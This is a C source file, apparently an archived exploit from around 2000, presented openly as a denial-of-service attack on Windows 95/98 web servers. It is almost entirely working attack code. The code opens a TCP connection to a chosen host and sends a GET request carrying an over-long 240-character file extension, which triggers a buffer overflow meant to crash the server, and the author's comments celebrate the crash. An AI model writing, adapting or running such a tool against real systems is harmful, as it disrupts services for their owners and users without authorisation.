/*

 Description: Dos Attack against any windows version (95/98 TESTED) by wildcoyote
 Comments   : Windows 95 and 98 suffer from a buffer overflow that will result in a
              crash if a filename with an extension longer that 232 characters is accessed.
              Although arbitrary code could be executed via this manner, it would have to
              composed of valid filename character values only.
              Windows NT 4.0 has not yet been tested for this vulnerability, and therefore may be vulnerable as well.
              (According to a bugtraq advisorie)
              Btw, knowing this, i'll use thiz flaw in windows using a GET command to a file of that caracteristicz...
              (on any HTTP win [serving] host)
 Flamez to  : wildcoyote@gk-team.org

*/

#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>

int 
openhost(char *host,int port) {
   int sock;
   struct sockaddr_in addr;
   struct hostent *he;
   
   he=gethostbyname(host);
   
   if (he==NULL) {
      perror("gethostbyname()");
      exit(-1); }
   
   sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
   
   if (sock==-1) {
      perror("socket()");
      exit(-1); }

   memcpy(&addr.sin_addr, he->h_addr, he->h_length);
   addr.sin_family=AF_INET;
   addr.sin_port=htons(port);

   if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
       sock=-2; }

   return sock;
}

void 
sends(int sock,char *buf) {
  write(sock,buf,strlen(buf));
}

void 
attack(char *host, int port)
{
 int sock,i;
 char *buf;
 printf("\n\tDos Attack against any windows version (95/98 TESTED) by wildcoyote\n\n");
 printf("Trying to connect to %s (%d)....(please wait)\n",host,port);
 sock=openhost(host,port);
 if(sock<=0) {
     printf("- Could not connect -\n");
     printf("Exiting...\n\n");
     exit(-1);
 }
 else printf("Connected to %s (%d)\n",host,port);
 buf = (char *) malloc(260);
 strcpy(buf,"GET /command.");
 for(i=0;i<240;i++) strcat(buf,"A");
 strcat(buf,"\n");
 printf("Oh k! Sending a 240'char (extension) filename request to host...\n");
 sends(sock,buf);
 close(sock);
 free(buf);
 printf("Crash sent! The host *probably* crashed :P\n");
 printf("Send flamez to wildcoyote@gk-team.org, *Enjoy*...\n\n");
}

main(int argc, char *argv[])
{
 int sock,i;
 if (argc<2) {
    printf("\n\tDos Attack against any windows version (95/98 TESTED) by wildcoyote\n\n");
    printf("Sintaxe: %s <host> [port - default 80]\n",argv[0]);
    printf("Send flamez to wildcoyote@gk-team.org, *Enjoy*...\n\n");
 }
 else if (argc==2) attack(argv[1],80);
      else attack(argv[1],atoi(argv[2]));
}
/*                    www.hack.co.za           [1 August2000